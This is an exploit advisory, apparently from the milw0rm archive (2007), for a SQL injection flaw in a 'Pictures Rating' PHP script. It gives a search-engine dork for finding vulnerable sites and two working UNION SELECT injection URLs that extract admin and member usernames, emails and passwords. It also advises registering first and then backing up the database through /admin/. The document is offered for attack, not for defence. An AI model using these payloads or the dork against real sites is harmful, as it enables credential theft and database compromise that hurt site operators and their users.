33 lines
No EOL
1.2 KiB
Text
33 lines
No EOL
1.2 KiB
Text
--==+================================================================================+==--
|
|
--==+ Pictures Rating SQL Injection Vulnerbility +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
SITE: N/A
|
|
DORK: allintext:"Latest Pictures" Name Gender Profile Rating
|
|
|
|
|
|
DESCRIPTION:
|
|
pull out admin/members info
|
|
|
|
|
|
EXPLOITS:
|
|
http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),5,6,7/**/FROM/**/admin/*
|
|
http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,email,0x3a,password,0x3c623e),5,6,7/**/FROM/**/members/*
|
|
|
|
|
|
NOTE/TIP:
|
|
you must register first
|
|
admin login is at /admin/ you can backup the DB there.
|
|
|
|
|
|
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Pictures Rating SQL Injection Vulnerbility +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-07-18] |